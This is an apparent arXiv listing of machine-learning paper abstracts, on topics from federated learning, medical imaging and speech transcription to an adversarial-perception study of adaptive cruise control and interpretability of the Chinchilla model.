    As an efficient distributed machine learning approach, federated learning (FL) can obtain a shared model by iterative local model training at the user side and global model aggregation at the central server side, thereby protecting the privacy of users. Mobile users in FL systems typically communicate with base stations (BSs) via wireless channels, where training performance can be degraded due to unreliable access caused by user mobility. However, existing work only investigates static scenarios or random initialization of user locations, which fail to capture mobility in real-world networks. To tackle this issue, we propose a practical model for user mobility in FL across multiple BSs, and develop a user scheduling and resource allocation method to minimize the training delay with constrained communication resources. Specifically, we first formulate an optimization problem with user mobility that jointly considers user selection, BS assignment to users, and bandwidth allocation to minimize the latency in each communication round. This optimization problem turns out to be NP-hard, and we propose a delay-aware greedy search algorithm (DAGSA) to solve it. Simulation results show that the proposed algorithm achieves better performance than state-of-the-art baselines and that a certain level of user mobility can actually improve training performance.  ( 2 min )
    Experimental Security Analysis of DNN-based Adaptive Cruise Control under Context-Aware Perception Attacks. (arXiv:2307.08939v1 [cs.CR])
    Adaptive Cruise Control (ACC) is a widely used driver assistance feature for maintaining desired speed and safe distance to the leading vehicles. This paper evaluates the security of the deep neural network (DNN) based ACC systems under stealthy perception attacks that strategically inject perturbations into camera data to cause forward collisions. We present a combined knowledge-and-data-driven approach to design a context-aware strategy for the selection of the most critical times for triggering the attacks and a novel optimization-based method for the adaptive generation of image perturbations at run-time. We evaluate the effectiveness of the proposed attack using an actual driving dataset and a realistic simulation platform with the control software from a production ACC system and a physical-world driving simulator while considering interventions by the driver and safety features such as Automatic Emergency Braking (AEB) and Forward Collision Warning (FCW). Experimental results show that the proposed attack achieves 142.9x higher success rate in causing accidents than random attacks and is mitigated 89.6% less by the safety features while being stealthy and robust to real-world factors and dynamic changes in the environment. This study provides insights into the role of human operators and basic safety interventions in preventing attacks.  ( 3 min )
    Multi-class point cloud completion networks for 3D cardiac anatomy reconstruction from cine magnetic resonance images. (arXiv:2307.08535v2 [eess.IV] UPDATED)
    Cine magnetic resonance imaging (MRI) is the current gold standard for the assessment of cardiac anatomy and function. However, it typically only acquires a set of two-dimensional (2D) slices of the underlying three-dimensional (3D) anatomy of the heart, thus limiting the understanding and analysis of both healthy and pathological cardiac morphology and physiology. In this paper, we propose a novel fully automatic surface reconstruction pipeline capable of reconstructing multi-class 3D cardiac anatomy meshes from raw cine MRI acquisitions. Its key component is a multi-class point cloud completion network (PCCN) capable of correcting both the sparsity and misalignment issues of the 3D reconstruction task in a unified model. We first evaluate the PCCN on a large synthetic dataset of biventricular anatomies and observe Chamfer distances between reconstructed and gold standard anatomies below or similar to the underlying image resolution for multiple levels of slice misalignment. Furthermore, we find a reduction in reconstruction error compared to a benchmark 3D U-Net by 32% and 24% in terms of Hausdorff distance and mean surface distance, respectively. We then apply the PCCN as part of our automated reconstruction pipeline to 1000 subjects from the UK Biobank study in a cross-domain transfer setting and demonstrate its ability to reconstruct accurate and topologically plausible biventricular heart meshes with clinical metrics comparable to the previous literature. Finally, we investigate the robustness of our proposed approach and observe its capacity to successfully handle multiple common outlier conditions.  ( 3 min )
    Unsupervised Learning of Distributional Properties can Supplement Human Labeling and Increase Active Learning Efficiency in Anomaly Detection. (arXiv:2307.08782v1 [cs.LG])
    Exfiltration of data via email is a serious cybersecurity threat for many organizations. Detecting data exfiltration (anomaly) patterns typically requires labeling, most often done by a human annotator, to reduce the high number of false alarms. Active Learning (AL) is a promising approach for labeling data efficiently, but it needs to choose an efficient order in which cases are to be labeled, and there are uncertainties as to what scoring procedure should be used to prioritize cases for labeling, especially when detecting rare cases of interest is crucial. We propose an adaptive AL sampling strategy that leverages the underlying prior data distribution, as well as model uncertainty, to produce batches of cases to be labeled that contain instances of rare anomalies. We show that (1) the classifier benefits from a batch of representative and informative instances of both normal and anomalous examples, and (2) unsupervised anomaly detection plays a useful role in building the classifier in the early stages of training, when relatively little labeling has been done. Our approach to AL for anomaly detection outperformed existing AL approaches on three highly unbalanced UCI benchmarks and on one real-world redacted email data set.  ( 2 min )
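    The paper's exact scoring procedure is not given here, but the general pattern it describes, ranking unlabeled cases by a blend of an unsupervised anomaly score and classifier uncertainty, can be sketched as follows. The blending weight and score functions are illustrative assumptions, not the authors' method:

```python
import numpy as np

def select_batch(anomaly_scores, class_probs, batch_size, alpha=0.5):
    """Rank unlabeled cases by a blend of anomaly score and
    classifier uncertainty (predictive entropy); return the top batch."""
    probs = np.clip(class_probs, 1e-12, 1.0)
    entropy = -(probs * np.log(probs)).sum(axis=1)          # model uncertainty
    score = alpha * anomaly_scores + (1 - alpha) * entropy  # blended priority
    return np.argsort(score)[::-1][:batch_size]

rng = np.random.default_rng(0)
probs = rng.dirichlet([1, 1], size=10)   # 10 unlabeled cases, 2 classes
anom = rng.random(10)                    # e.g. from an unsupervised detector
print(select_batch(anom, probs, batch_size=3))
```

    In the early rounds, the anomaly term dominates the ranking usefully because the classifier's uncertainty estimates are not yet informative, matching the paper's observation (2).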
    OxfordVGG Submission to the EGO4D AV Transcription Challenge. (arXiv:2307.09006v1 [cs.SD])
    This report presents the technical details of our submission on the EGO4D Audio-Visual (AV) Automatic Speech Recognition Challenge 2023 from the OxfordVGG team. We present WhisperX, a system for efficient speech transcription of long-form audio with word-level time alignment, along with two text normalisers which are publicly available. Our final submission obtained 56.0% of the Word Error Rate (WER) on the challenge test set, ranked 1st on the leaderboard. All baseline codes and models are available on https://github.com/m-bain/whisperX.  ( 2 min )
    Don't Memorize; Mimic The Past: Federated Class Incremental Learning Without Episodic Memory. (arXiv:2307.00497v2 [cs.LG] UPDATED)
    Deep learning models are prone to forgetting information learned in the past when trained on new data. This problem becomes even more pronounced in the context of federated learning (FL), where data is decentralized and subject to independent changes for each user. Continual Learning (CL) studies this so-called "catastrophic forgetting" phenomenon primarily in centralized settings, where the learner has direct access to the complete training dataset. However, applying CL techniques to FL is not straightforward due to privacy concerns and resource limitations. This paper presents a framework for federated class incremental learning that utilizes a generative model to synthesize samples from past distributions instead of storing part of past data. Then, clients can leverage the generative model to mitigate catastrophic forgetting locally. The generative model is trained on the server using data-free methods at the end of each task without requesting data from clients. Therefore, it reduces the risk of data leakage as opposed to training it on the client's private data. We demonstrate significant improvements for the CIFAR-100 dataset compared to existing baselines.  ( 2 min )
    On-the-fly machine learning for parametrization of the effective Hamiltonian. (arXiv:2307.08929v1 [cond-mat.mtrl-sci])
    The first-principles-based effective Hamiltonian is widely used to predict and simulate the properties of ferroelectrics and relaxor ferroelectrics. However, parametrizing the effective Hamiltonian is complicated, and existing methods can hardly handle systems with complex interactions and/or complex components. Here, we developed an on-the-fly machine learning approach to parametrize the effective Hamiltonian based on Bayesian linear regression. The parametrization is completed in molecular dynamics simulations, with the energy, forces, and stress predicted at each step along with their uncertainties. First-principles calculations are executed when the uncertainties are large, to retrain the parameters. This approach provides a universal and automatic way to compute the effective Hamiltonian parameters for any system of interest, including complex systems that previous methods cannot handle. BaTiO3 and Pb(Sc,Ta)O3 are taken as examples to show the accuracy of this approach compared with the conventional first-principles parametrization method.  ( 2 min )
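    The core loop described, predict with uncertainty, fall back to the expensive reference calculation when the predictive variance is too large, then retrain, can be sketched with closed-form Bayesian linear regression. The toy oracle below stands in for a first-principles (e.g. DFT) call, and the threshold and precisions are illustrative, not the paper's settings:

```python
import numpy as np

class BayesianLinReg:
    """Closed-form Bayesian linear regression with predictive variance."""
    def __init__(self, dim, alpha=1.0, beta=25.0):
        self.alpha, self.beta = alpha, beta   # prior and noise precision
        self.S_inv = alpha * np.eye(dim)      # posterior precision
        self.m = np.zeros(dim)                # posterior mean
        self._b = np.zeros(dim)

    def update(self, x, y):
        self.S_inv += self.beta * np.outer(x, x)
        self._b += self.beta * y * x
        self.m = np.linalg.solve(self.S_inv, self._b)

    def predict(self, x):
        S = np.linalg.inv(self.S_inv)
        mean = self.m @ x
        var = 1.0 / self.beta + x @ S @ x     # predictive variance
        return mean, var

oracle = lambda x: 3.0 * x[0] - 2.0 * x[1]    # stand-in for a first-principles call
model = BayesianLinReg(dim=2)
rng = np.random.default_rng(1)
calls = 0
for _ in range(200):
    x = rng.normal(size=2)
    mean, var = model.predict(x)
    if var > 0.05:           # too uncertain: query the oracle and retrain
        model.update(x, oracle(x))
        calls += 1
print(calls)  # typically far fewer oracle calls than the 200 MD steps
```

    Once the posterior has tightened, almost every step is served by the cheap surrogate, which is what makes the on-the-fly scheme pay off.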
    REX: Rapid Exploration and eXploitation for AI Agents. (arXiv:2307.08962v1 [cs.AI])
    In this paper, we propose an enhanced approach for Rapid Exploration and eXploitation for AI Agents called REX. Existing AutoGPT-style techniques have inherent limitations, such as a heavy reliance on precise descriptions for decision-making, and the lack of a systematic approach to leverage try-and-fail procedures akin to traditional Reinforcement Learning (RL). REX introduces an additional layer of rewards and integrates concepts similar to Upper Confidence Bound (UCB) scores, leading to more robust and efficient AI agent performance. This approach has the advantage of enabling the utilization of offline behaviors from logs and allowing seamless integration with existing foundation models, while it does not require any model fine-tuning. Through comparative analysis with existing methods such as Chain-of-Thought (CoT) and Reasoning viA Planning (RAP), REX-based methods demonstrate comparable performance and, in certain cases, even surpass the results achieved by these existing techniques. Notably, REX-based methods exhibit remarkable reductions in execution time, enhancing their practical applicability across a diverse set of scenarios.  ( 2 min )
    Deep Learning with Passive Optical Nonlinear Mapping. (arXiv:2307.08558v2 [physics.optics] UPDATED)
    Deep learning has fundamentally transformed artificial intelligence, but the ever-increasing complexity in deep learning models calls for specialized hardware accelerators. Optical accelerators can potentially offer enhanced performance, scalability, and energy efficiency. However, achieving nonlinear mapping, a critical component of neural networks, remains challenging optically. Here, we introduce a design that leverages multiple scattering in a reverberating cavity to passively induce optical nonlinear random mapping, without the need for additional laser power. A key advantage emerging from our work is that we show we can perform optical data compression, facilitated by multiple scattering in the cavity, to efficiently compress and retain vital information while also decreasing data dimensionality. This allows rapid optical information processing and generation of low dimensional mixtures of highly nonlinear features. These are particularly useful for applications demanding high-speed analysis and responses such as in edge computing devices. Utilizing rapid optical information processing capabilities, our optical platforms could potentially offer more efficient and real-time processing solutions for a broad range of applications. We demonstrate the efficacy of our design in improving computational performance across tasks, including classification, image reconstruction, key-point detection, and object detection, all achieved through optical data compression combined with a digital decoder. Notably, we observed high performance, at an extreme compression ratio, for real-time pedestrian detection. Our findings pave the way for novel algorithms and architectural designs for optical computing.  ( 3 min )
    TabText: A Flexible and Contextual Approach to Tabular Data Representation. (arXiv:2206.10381v3 [cs.LG] UPDATED)
    Tabular data is essential for applying machine learning tasks across various industries. However, traditional data processing methods do not fully utilize all the information available in the tables, ignoring important contextual information such as column header descriptions. In addition, pre-processing data into a tabular format can remain a labor-intensive bottleneck in model development. This work introduces TabText, a processing and feature extraction framework that extracts contextual information from tabular data structures. TabText addresses processing difficulties by converting the content into language and utilizing pre-trained large language models (LLMs). We evaluate our framework on nine healthcare prediction tasks ranging from patient discharge, ICU admission, and mortality. We show that 1) applying our TabText framework enables the generation of high-performing and simple machine learning baseline models with minimal data pre-processing, and 2) augmenting pre-processed tabular data with TabText representations improves the average and worst-case AUC performance of standard machine learning models by as much as 6%.  ( 2 min )
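    The core TabText move, serializing a row together with human-readable column descriptions into a sentence an LLM can embed, can be sketched as follows. The column names, descriptions, and template are illustrative, not the paper's exact format:

```python
def row_to_text(row, descriptions):
    """Serialize one tabular record into natural language, using
    human-readable column descriptions instead of raw headers."""
    parts = [f"{descriptions.get(col, col)} is {val}"
             for col, val in row.items() if val not in (None, "")]
    return "; ".join(parts) + "."

row = {"age": 67, "icu": "yes", "hr": 92}
desc = {"age": "patient age", "icu": "admitted to ICU", "hr": "heart rate"}
print(row_to_text(row, desc))
# patient age is 67; admitted to ICU is yes; heart rate is 92.
```

    The resulting strings can then be fed to a pre-trained LLM encoder, and the embeddings used either alone or concatenated with the original tabular features, the "augmentation" setting the abstract reports gains for.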
    DiTTO: Diffusion-inspired Temporal Transformer Operator. (arXiv:2307.09072v1 [cs.LG])
    Solving partial differential equations (PDEs) using a data-driven approach has become increasingly common. The recent development of the operator learning paradigm has enabled the solution of a broader range of PDE-related problems. We propose an operator learning method to solve time-dependent PDEs continuously in time without needing any temporal discretization. The proposed approach, named DiTTO, is inspired by latent diffusion models. While diffusion models are usually used in generative artificial intelligence tasks, their time-conditioning mechanism is extremely useful for PDEs. The diffusion-inspired framework is combined with elements from the Transformer architecture to improve its capabilities. We demonstrate the effectiveness of the new approach on a wide variety of PDEs in multiple dimensions, namely the 1-D Burgers' equation, 2-D Navier-Stokes equations, and the acoustic wave equation in 2-D and 3-D. DiTTO achieves state-of-the-art results in terms of accuracy for these problems. We also present a method to improve the performance of DiTTO by using fast sampling concepts from diffusion models. Finally, we show that DiTTO can accurately perform zero-shot super-resolution in time.  ( 2 min )
    Gradient Surgery for One-shot Unlearning on Generative Model. (arXiv:2307.04550v2 [cs.LG] UPDATED)
    Recent regulation on the right to be forgotten has sparked great interest in unlearning pre-trained machine learning models. To approximate the straightforward yet expensive retrain-from-scratch approach, recent machine unlearning methods unlearn a sample by updating weights to remove its influence on the weight parameters. In this paper, we introduce a simple yet effective approach to remove the influence of a data sample on a deep generative model. Inspired by work in multi-task learning, we propose to manipulate gradients to regularize the interplay of influence among samples by projecting gradients onto the normal plane of the gradients to be retained. Our method is agnostic to the statistics of the removed samples, outperforming existing baselines while providing the first theoretical analysis of unlearning a generative model.  ( 2 min )
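    The projection described, moving the unlearning gradient onto the normal plane of the gradient to be retained, amounts to subtracting its component along the retained gradient, as in multi-task gradient surgery. A minimal numpy sketch of that single operation (not the authors' full method):

```python
import numpy as np

def project_to_normal_plane(g_forget, g_retain):
    """Remove from g_forget its component along g_retain, so the
    unlearning step does not move along the retained direction."""
    denom = g_retain @ g_retain
    if denom == 0.0:
        return g_forget
    return g_forget - (g_forget @ g_retain) / denom * g_retain

g_f = np.array([1.0, 1.0])   # gradient for the sample to unlearn
g_r = np.array([1.0, 0.0])   # gradient for samples to retain
print(project_to_normal_plane(g_f, g_r))  # [0. 1.]
```

    By construction the projected gradient is orthogonal to `g_retain`, so a step along it is (to first order) neutral for the retained samples.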
    TableGPT: Towards Unifying Tables, Nature Language and Commands into One GPT. (arXiv:2307.08674v2 [cs.AI] UPDATED)
    Tables are prevalent in real-world databases, requiring significant time and effort for humans to analyze and manipulate. The advancements in large language models (LLMs) have made it possible to interact with tables using natural language input, bringing this capability closer to reality. In this paper, we present TableGPT, a unified fine-tuned framework that enables LLMs to understand and operate on tables using external functional commands. It introduces the capability to seamlessly interact with tables, enabling a wide range of functionalities such as question answering, data manipulation (e.g., insert, delete, query, and modify operations), data visualization, analysis report generation, and automated prediction. TableGPT aims to provide convenience and accessibility to users by empowering them to effortlessly leverage tabular data. At the core of TableGPT lies the novel concept of global tabular representations, which empowers LLMs to gain a comprehensive understanding of the entire table beyond meta-information. By jointly training LLMs on both table and text modalities, TableGPT achieves a deep understanding of tabular data and the ability to perform complex operations on tables through chain-of-command instructions. Importantly, TableGPT offers the advantage of being a self-contained system rather than relying on external API interfaces. Moreover, it supports efficient data process flow, query rejection (when appropriate) and private deployment, enabling faster domain data fine-tuning and ensuring data privacy, which enhances the framework's adaptability to specific use cases.  ( 3 min )
    Efficient Strongly Polynomial Algorithms for Quantile Regression. (arXiv:2307.08706v1 [cs.CG])
    Linear Regression is a seminal technique in statistics and machine learning, where the objective is to build linear predictive models between a response (i.e., dependent) variable and one or more predictor (i.e., independent) variables. In this paper, we revisit the classical technique of Quantile Regression (QR), which is statistically a more robust alternative to the other classical technique of Ordinary Least Square Regression (OLS). However, while there exist efficient algorithms for OLS, almost all of the known results for QR are only weakly polynomial. Towards filling this gap, this paper proposes several efficient strongly polynomial algorithms for QR for various settings. For two dimensional QR, making a connection to the geometric concept of $k$-set, we propose an algorithm with a deterministic worst-case time complexity of $\mathcal{O}(n^{4/3} polylog(n))$ and an expected time complexity of $\mathcal{O}(n^{4/3})$ for the randomized version. We also propose a randomized divide-and-conquer algorithm -- RandomizedQR with an expected time complexity of $\mathcal{O}(n\log^2{(n)})$ for two dimensional QR problem. For the general case with more than two dimensions, our RandomizedQR algorithm has an expected time complexity of $\mathcal{O}(n^{d-1}\log^2{(n)})$.  ( 2 min )
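    The objective these algorithms optimize is the standard pinball (check) loss, which penalizes overshooting and undershooting a target quantile asymmetrically; this is what makes QR more robust than OLS. A direct evaluation of that standard definition:

```python
def pinball_loss(y_true, y_pred, tau):
    """Check loss for quantile tau: residuals above the prediction cost
    tau per unit, residuals below cost (1 - tau) per unit."""
    total = 0.0
    for y, p in zip(y_true, y_pred):
        diff = y - p
        total += tau * diff if diff >= 0 else (tau - 1) * diff
    return total / len(y_true)

# Median regression (tau = 0.5) reduces to half the mean absolute error.
print(pinball_loss([1.0, 3.0], [2.0, 2.0], tau=0.5))  # 0.5
```

    Minimizing this loss over a linear predictor is the two-dimensional (one predictor) and general d-dimensional problem the abstract's strongly polynomial algorithms address.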
    Mitigating Transformer Overconfidence via Lipschitz Regularization. (arXiv:2306.06849v2 [cs.LG] UPDATED)
    Though Transformers have achieved promising results in many computer vision tasks, they tend to be over-confident in predictions, as the standard Dot Product Self-Attention (DPSA) can barely preserve distance for the unbounded input domain. In this work, we fill this gap by proposing a novel Lipschitz Regularized Transformer (LRFormer). Specifically, we present a new similarity function with the distance within Banach Space to ensure the Lipschitzness and also regularize the term by a contractive Lipschitz Bound. The proposed method is analyzed with a theoretical guarantee, providing a rigorous basis for its effectiveness and reliability. Extensive experiments conducted on standard vision benchmarks demonstrate that our method outperforms the state-of-the-art single forward pass approaches in prediction, calibration, and uncertainty estimation.
    Continuous-Time Reinforcement Learning: New Design Algorithms with Theoretical Insights and Performance Guarantees. (arXiv:2307.08920v1 [eess.SY])
    Continuous-time nonlinear optimal control problems hold great promise in real-world applications. After decades of development, reinforcement learning (RL) has achieved some of the greatest successes as a general nonlinear control design method. However, a recent comprehensive analysis of state-of-the-art continuous-time RL (CT-RL) methods, namely, adaptive dynamic programming (ADP)-based CT-RL algorithms, reveals they face significant design challenges due to their complexity, numerical conditioning, and dimensional scaling issues. Despite advanced theoretical results, existing ADP CT-RL synthesis methods are inadequate in solving even small, academic problems. The goal of this work is thus to introduce a suite of new CT-RL algorithms for control of affine nonlinear systems. Our design approach relies on two important factors. First, our methods are applicable to physical systems that can be partitioned into smaller subproblems. This constructive consideration results in reduced dimensionality and greatly improved intuitiveness of design. Second, we introduce a new excitation framework to improve persistence of excitation (PE) and numerical conditioning performance via classical input/output insights. Such a design-centric approach is the first of its kind in the ADP CT-RL community. In this paper, we progressively introduce a suite of (decentralized) excitable integral reinforcement learning (EIRL) algorithms. We provide convergence and closed-loop stability guarantees, and we demonstrate these guarantees on a significant application problem of controlling an unstable, nonminimum phase hypersonic vehicle (HSV).
    Outlier-Robust Tensor Low-Rank Representation for Data Clustering. (arXiv:2307.09055v1 [stat.ML])
    Low-rank tensor analysis has received widespread attention with many practical applications. However, the tensor data are often contaminated by outliers or sample-specific corruptions. How to recover the tensor data that are corrupted by outliers and perform data clustering remains a challenging problem. This paper develops an outlier-robust tensor low-rank representation (OR-TLRR) method for simultaneous outlier detection and tensor data clustering based on the tensor singular value decomposition (t-SVD) algebraic framework. It is motivated by the recently proposed tensor-tensor product induced by invertible linear transforms that satisfy certain conditions. For tensor observations with arbitrary outlier corruptions, OR-TLRR has provable performance guarantee for exactly recovering the row space of clean data and detecting outliers under mild conditions. Moreover, an extension of OR-TLRR is also proposed to handle the case when parts of the data are missing. Finally, extensive experimental results on both synthetic and real data demonstrate the effectiveness of the proposed algorithms.
    Continuous Monte Carlo Graph Search. (arXiv:2210.01426v2 [cs.AI] UPDATED)
    In many complex sequential decision-making tasks, online planning is crucial for high performance. For efficient online planning, Monte Carlo Tree Search (MCTS) employs a principled mechanism for trading off exploration for exploitation. MCTS outperforms comparison methods in many discrete decision-making domains such as Go, Chess, and Shogi. Subsequently, extensions of MCTS to continuous domains have been proposed. However, the inherent high branching factor and the resulting explosion of search tree size limit existing methods. To address this problem, we propose Continuous Monte Carlo Graph Search (CMCGS), a novel extension of MCTS to online planning in environments with continuous state and action spaces. CMCGS takes advantage of the insight that, during planning, sharing the same action policy between several states can yield high performance. To implement this idea, at each time step, CMCGS clusters similar states into a limited number of stochastic action bandit nodes, which produce a layered directed graph instead of an MCTS search tree. Experimental evaluation shows that CMCGS outperforms comparable planning methods in several complex continuous DeepMind Control Suite benchmarks and a 2D navigation task with limited sample budgets. Furthermore, CMCGS can be parallelized to scale up and it outperforms the Cross-Entropy Method (CEM) in continuous control with learned dynamics models.
    Does Circuit Analysis Interpretability Scale? Evidence from Multiple Choice Capabilities in Chinchilla. (arXiv:2307.09458v1 [cs.LG])
    Circuit analysis is a promising technique for understanding the internal mechanisms of language models. However, existing analyses are done in small models far from the state of the art. To address this, we present a case study of circuit analysis in the 70B Chinchilla model, aiming to test the scalability of circuit analysis. In particular, we study multiple-choice question answering, and investigate Chinchilla's capability to identify the correct answer 'label' given knowledge of the correct answer 'text'. We find that the existing techniques of logit attribution, attention pattern visualization, and activation patching naturally scale to Chinchilla, allowing us to identify and categorize a small set of 'output nodes' (attention heads and MLPs). We further study the 'correct letter' category of attention heads aiming to understand the semantics of their features, with mixed results. For normal multiple-choice question answers, we significantly compress the query, key and value subspaces of the head without loss of performance when operating on the answer labels for multiple-choice questions, and we show that the query and key subspaces represent an 'Nth item in an enumeration' feature to at least some extent. However, when we attempt to use this explanation to understand the heads' behaviour on a more general distribution including randomized answer labels, we find that it is only a partial explanation, suggesting there is more to learn about the operation of 'correct letter' heads on multiple choice question answering.
    Discretization-based ensemble model for robust learning in IoT. (arXiv:2307.08955v1 [cs.LG])
    IoT device identification is the process of recognizing and verifying IoT devices connected to the network. This is an essential process for ensuring that only authorized devices can access the network, and it is necessary for network management and maintenance. In recent years, machine learning models have been widely used to automate the process of identifying devices in the network. However, these models are vulnerable to adversarial attacks that can compromise their accuracy and effectiveness. To better secure device identification models, discretization techniques reduce the sensitivity of machine learning models to adversarial attacks, contributing to the stability and reliability of the model. On the other hand, ensemble methods combine multiple heterogeneous models to reduce the impact of remaining noise or errors in the model. Therefore, in this paper, we integrate discretization techniques with ensemble methods and examine their effect on model robustness against adversarial attacks. In other words, we propose a discretization-based ensemble stacking technique to improve the security of our ML models. We evaluate the performance of different ML-based IoT device identification models against white-box and black-box attacks using a real-world dataset comprised of network traffic from 28 IoT devices. We demonstrate that the proposed method improves the robustness of the models for IoT device identification.
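    The intuition behind the discretization step is that an adversarial perturbation small enough to stay within a bin leaves the discretized input unchanged. A sketch using equal-width binning per feature (the binning scheme is illustrative; the paper's exact discretization may differ):

```python
import numpy as np

def discretize(X, n_bins=8):
    """Equal-width binning per feature: perturbations that stay inside
    a bin leave the discretized representation unchanged."""
    lo, hi = X.min(axis=0), X.max(axis=0)
    width = np.where(hi > lo, (hi - lo) / n_bins, 1.0)  # avoid div-by-zero
    return np.clip(((X - lo) / width).astype(int), 0, n_bins - 1)

# Rows 0 and 1 differ by a small perturbation; row 2 is a distinct device.
X = np.array([[0.0, 10.0], [0.49, 14.9], [4.0, 50.0]])
print(discretize(X, n_bins=8))
```

    The discretized features then feed each base model of the stacked ensemble, so residual errors of individual models are averaged out on top of the per-feature robustness the binning provides.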
    Neural Network Pruning as Spectrum Preserving Process. (arXiv:2307.08982v1 [cs.LG])
    Neural networks have achieved remarkable performance in various application domains. Nevertheless, the large number of weights in pre-trained deep neural networks prohibits them from being deployed on smartphones and embedded systems. It is highly desirable to obtain lightweight versions of neural networks for inference on edge devices. Many cost-effective approaches have been proposed to prune the dense and convolutional layers that are common in deep neural networks and dominant in the parameter space. However, a unified theoretical foundation for the problem is mostly missing. In this paper, we identify the close connection between matrix spectrum learning and neural network training for dense and convolutional layers, and argue that weight pruning is essentially a matrix sparsification process that preserves the spectrum. Based on this analysis, we also propose a matrix sparsification algorithm tailored for neural network pruning that yields better pruning results. We carefully design and conduct experiments to support our arguments. Hence we provide a consolidated viewpoint for neural network pruning and enhance the interpretability of deep neural networks by identifying and preserving the critical neural weights.
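    The spectrum-preservation claim is easy to probe numerically: zero out half the entries of a weight matrix by magnitude and compare singular values before and after. Magnitude pruning here is the simplest baseline, not the paper's tailored sparsification algorithm:

```python
import numpy as np

def magnitude_prune(W, sparsity):
    """Zero out the smallest-magnitude entries of W."""
    k = int(W.size * sparsity)
    thresh = np.sort(np.abs(W), axis=None)[k]
    return np.where(np.abs(W) >= thresh, W, 0.0)

rng = np.random.default_rng(0)
W = rng.normal(size=(64, 64))          # stand-in for a dense layer's weights
W_sparse = magnitude_prune(W, sparsity=0.5)

s = np.linalg.svd(W, compute_uv=False)
s_sparse = np.linalg.svd(W_sparse, compute_uv=False)
rel_err = np.abs(s - s_sparse).max() / s.max()
print(round(float(rel_err), 3))  # max relative change across singular values
```

    Even with half the entries removed, the singular values move far less than the parameter count would suggest, which is the intuition the paper formalizes and then improves on with a spectrum-aware sparsification rule.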
    CB-HVTNet: A channel-boosted hybrid vision transformer network for lymphocyte assessment in histopathological images. (arXiv:2305.09211v2 [eess.IV] UPDATED)
    Transformers, due to their ability to learn long-range dependencies, have overcome the shortcomings of convolutional neural networks (CNNs) for global perspective learning. Therefore, they have attracted the attention of researchers for several vision-related tasks, including medical diagnosis. However, their multi-head attention module only captures global-level feature representations, which is insufficient for medical images. To address this issue, we propose a Channel Boosted Hybrid Vision Transformer (CB HVT) that uses transfer learning to generate boosted channels and employs both transformers and CNNs to analyse lymphocytes in histopathological images. The proposed CB HVT comprises five modules, including a channel generation module, channel exploitation module, channel merging module, region-aware module, and a detection and segmentation head, which work together to effectively identify lymphocytes. The channel generation module uses the idea of channel boosting through transfer learning to extract diverse channels from different auxiliary learners. In the CB HVT, these boosted channels are first concatenated and ranked using an attention mechanism in the channel exploitation module. A fusion block is then utilized in the channel merging module for a gradual and systematic merging of the diverse boosted channels to improve the network's learning representations. The CB HVT also employs a proposal network in its region-aware module and a head to effectively identify objects, even in overlapping regions and with artifacts. We evaluated the proposed CB HVT on two publicly available datasets for lymphocyte assessment in histopathological images. The results show that CB HVT outperformed other state-of-the-art detection models, and has good generalization ability, demonstrating its value as a tool for pathologists.
    Intuitionistic Fuzzy Broad Learning System: Enhancing Robustness Against Noise and Outliers. (arXiv:2307.08713v1 [cs.LG])
    In the realm of data classification, the broad learning system (BLS) has proven to be a potent tool that utilizes a layer-by-layer feed-forward neural network. It consists of feature learning and enhancement segments, working together to extract intricate features from input data. The traditional BLS treats all samples as equally significant, which makes it less robust and less effective for real-world datasets with noise and outliers. To address this issue, we propose the fuzzy BLS (F-BLS) model, which assigns a fuzzy membership value to each training point to reduce the influence of noise and outliers. In assigning the membership value, the F-BLS model solely considers the distance from samples to the class center in the original feature space without incorporating the extent of non-belongingness to a class. We further propose a novel BLS based on intuitionistic fuzzy theory (IF-BLS). The proposed IF-BLS utilizes intuitionistic fuzzy numbers based on fuzzy membership and non-membership values to assign scores to training points in the high-dimensional feature space by using a kernel function. We evaluate the performance of the proposed F-BLS and IF-BLS models on 44 UCI benchmark datasets across diverse domains. Furthermore, Gaussian noise is added to some UCI datasets to assess the robustness of the proposed F-BLS and IF-BLS models. Experimental results demonstrate superior generalization performance of the proposed F-BLS and IF-BLS models compared to baseline models, both with and without Gaussian noise. Additionally, we implement the proposed F-BLS and IF-BLS models on the Alzheimer's Disease Neuroimaging Initiative (ADNI) dataset, and promising results showcase the models' effectiveness in real-world applications. The proposed methods offer a promising solution to enhance the BLS framework's ability to handle noise and outliers.
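    A minimal sketch of the distance-based fuzzy-membership idea behind F-BLS (our toy formula, not the authors' code): points far from their class center receive a low membership and therefore contribute less to the fit.

```python
# Assign each training point a membership mu_i = 1 - d_i / (d_max + delta),
# where d_i is the distance to the class mean; outliers get small weights.
import math

def fuzzy_memberships(points, delta=1e-3):
    dim = len(points[0])
    center = [sum(p[j] for p in points) / len(points) for j in range(dim)]
    dists = [math.dist(p, center) for p in points]
    d_max = max(dists)
    return [1.0 - d / (d_max + delta) for d in dists]

cluster = [(0.0, 0.0), (0.1, -0.1), (-0.1, 0.1), (5.0, 5.0)]  # last point is an outlier
mu = fuzzy_memberships(cluster)
print(mu[-1] < min(mu[:-1]))  # True: the outlier receives the smallest membership
```

    The intuitionistic variant (IF-BLS) would additionally attach a non-membership score per point; that part is omitted here.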
    MVA2023 Small Object Detection Challenge for Spotting Birds: Dataset, Methods, and Results. (arXiv:2307.09143v1 [cs.CV])
    Small Object Detection (SOD) is an important machine vision topic because (i) a variety of real-world applications require object detection for distant objects and (ii) SOD is a challenging task due to the noisy, blurred, and less-informative image appearances of small objects. This paper proposes a new SOD dataset consisting of 39,070 images including 137,121 bird instances, which is called the Small Object Detection for Spotting Birds (SOD4SB) dataset. The details of the challenge with the SOD4SB dataset are introduced in this paper. In total, 223 participants joined this challenge. This paper briefly introduces the award-winning methods. The dataset, the baseline code, and the website for evaluation on the public test set are publicly available.
    The Score-Difference Flow for Implicit Generative Modeling. (arXiv:2304.12906v2 [cs.LG] UPDATED)
    Implicit generative modeling (IGM) aims to produce samples of synthetic data matching the characteristics of a target data distribution. Recent work (e.g. score-matching networks, diffusion models) has approached the IGM problem from the perspective of pushing synthetic source data toward the target distribution via dynamical perturbations or flows in the ambient space. In this direction, we present the score difference (SD) between arbitrary target and source distributions as a flow that optimally reduces the Kullback-Leibler divergence between them while also solving the Schroedinger bridge problem. We apply the SD flow to convenient proxy distributions, which are aligned if and only if the original distributions are aligned. We demonstrate the formal equivalence of this formulation to denoising diffusion models under certain conditions. We also show that the training of generative adversarial networks includes a hidden data-optimization sub-problem, which induces the SD flow under certain choices of loss function when the discriminator is optimal. As a result, the SD flow provides a theoretical link between model classes that individually address the three challenges of the "generative modeling trilemma" -- high sample quality, mode coverage, and fast sampling -- thereby setting the stage for a unified approach.
